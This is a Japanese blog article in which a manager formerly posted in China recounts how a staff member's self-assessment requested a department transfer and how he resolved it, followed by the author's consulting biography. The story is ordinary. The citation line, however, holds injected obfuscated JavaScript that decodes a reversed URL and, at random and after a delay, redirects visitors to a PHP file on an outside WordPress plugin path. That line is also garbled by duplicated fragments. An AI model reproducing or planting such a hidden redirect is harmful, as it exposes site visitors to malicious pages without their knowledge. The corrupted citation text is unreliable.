自己申告に潜んでいた中国人スタッフの想い?!

自己申告に潜んでいた中国人スタッフの想い?!

以前わたしが中国に駐在していたときの
会社の中国工場・事務所では、
自己申告制度を導入していた。
対象は、管理者・監督者以上で、
現場作業者は実施の対象外でした。

わたしが見ていた部門のスタッフも対象だったので
実施されました。
実施後しばらくして人事課より「参考までに」と言って、
スタッフの自己申告の結果を渡されました。

当事、自己申告を実施しているのは知っていましたが、
その結果をどうするのかなどの事情を知らなかったわたしは、ちょっと困惑しました。

記載されていた内容を見て、
困惑が増すと同時にショックを受けたのを覚えています。
そこには「他の部門に行きたい」と書いてあったのです。
理由は、自分はその部門の方が向いているし、
その仕事をしたいと書いてありました。

わたしとしては、
そのスタッフにはずいぶん力を注いで育成してきたので、
「えっ、何で」という感じでショックだった。
そのときに頭にはもう一つのことが浮かんでいた。

もし本当に他の部門に行ってしまうとしたら、
ここまでいろいろ教えて、
やっと戦力になったのに、
また一から教えるのかと言う思いでした。
今思えば、中国ではこのようなことは起こると
覚悟しておくべきことでした。

人事にこの後どうするのか聞いてみたところ、
特に何もしなくてよいですよ。
ただスタッフがこんなこと考えていると
参考にしてくださいとあっさり言われました。

何もしなくてもよいと言われたので、
気にはなったものの何もせず日が過ぎた。
するとそのスタッフは、
なんと異動希望先部門のTOP(日本人)に
直接異動をお願いしていたのです。

その日本人駐在員から、
「彼はこんなこと言ってきてるけど、どうなっているの?」
と聞かれ、「正直困惑しています」と答えた。
彼の希望は分からなくもないが、
いま自分の部門から出す訳にはいかないとも言った。
そのスタッフの真意を確かめるために面談を行った。

最初の内は、話していても出たいの一点張りで、
最悪、異動出来ないなら辞めると言い出すのではと思った程です。
こちらもそうなったらなったで仕方がないとまで考えました。

よく話を聞いていくうちに、
少しずつ彼の考えや気持ちがわかってきました。
このスタッフは、
自分が昇格できないことに不満を持っていました。
彼は2年前に現場技術員だったのをこちらに
来てもらったと言う経緯がありました。
その部門にそのままいれば、
昇格できたと言うのが彼の言い分でした。

実際に前の部門の責任者に確認してみたところ、
昇格できたかは五分五分とのことでした。

何もしなくていいからと、
本当に何もしなかった自分を反省しました。
スタッフがどんな思いで自己申告を書いていたかを考えて、
もっと早く話を聞くべきだったと。

結局このスタッフに、今は他の部門に出せない事情を話し、
その事情が解消されて、そのときにも異動を希望していれば、その方向で考えると伝えました。
事情とは、彼に代わるスタッフが確保されることです。

また、評価についてもわたしの考え方を伝え、
今の仕事の内容とその結果に沿った
評価をしていることを説明した。
その時に100%納得したかは分かりませんが、
当面そのまま仕事を続けることで落ち着きました。

異動希望で、それが叶わないからと言って、
今の仕事をいいかげんにやることがないように話をし、
彼もそれはいけないことだと理解してくれていました。
取り敢えず落ち着いたものの、
このことはずっと頭に残っています。

 

出典:$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toimprove/entry-12291316776.html” target=”_blank”>自己申告に潜んでいた中国人スタッフの想い?!


KPIマネジメント代表・チーフコンサルタント◎電機系メーカーにて技術部門、資材部門を経て香港・中国に駐在。現地においては、購入部材の品質管理責任者として購入部材仕入先品質指導及び品質改善指導。延べ100社に及ぶ仕入先工場の品質改善指導に奔走 ◎東京都/千葉県商工会連合会専門エキスパート(品質管理、製造業指導) GCS認定コーチ◎日本生産性本部経営アカデミー講師 名古屋外国語大学非常勤講師 セミナー/企業研修講師多数◎中国工場コンサルティング実績 日系中国工場品質改善及び管理体制の見直し(広東省)、中国企業品質管理体制の構築(福建省1社)、中国企業労務人事管理監査対応指導(パートナーコンサルタントと共同で実施:広東省1社)、米国D社の労務人事監査指摘事項への対応を指導、中国工場品質管理体制の構築(広東、大連など2社)、中国工場運営管理支援(広東1社)、外観検査の精度向上指導(広東1社)、中国生産委託先工場監査代行(広東1社) 国内工場管理の見直し及び製品コストダウン、外灯製造会社の5S指導、金属加工会社の品質管理・改善、生産性向上指導(1社)、金属加工会社の組織再構築、経営改革指導(1社)、板金塗装会社の5S指導(1社)、環境関連企業の新工場立ち上げ支援(1社)◎製造業向け社員研修実績 中国人管理者教育(広東、大連、厦門など3社)、コーチング研修(2社)、来日した中国企業スタッフ研修、中国赴任前研修(パソナ様)、若手社員向け中国工場の問題点と対処法(和歌山県工業技術センター様)、中国工場品質管理講座&異文化コミュニケーション(富士通テレコムネットワークス様)、仕入先様品質管理勉強会 テーマ:中国工場での品質管理の進め方(株式会社オートバックスセブン様)、中国への生産委託に伴う工程/品質管理のポイント(N社様、I社様) ◎著書 こうすれば失敗しない!中国工場の品質改善<虎の巻>(日刊工業新聞社)、雑誌「標準化と品質管理」2012年8月号特集記事執筆(日本規格協会)、外観検査の不良見逃し・ばらつき低減(技術情報協会・共同執筆)、通信教育講座「外観目視検査の進め方と留意点」担当講師(テキスト執筆、添削指導) ◎KPIマネジメント http://www.prestoimprove.com/index.html ブログ「中国工場での品質管理・品質改善」https://ameblo.jp/prestoimprove/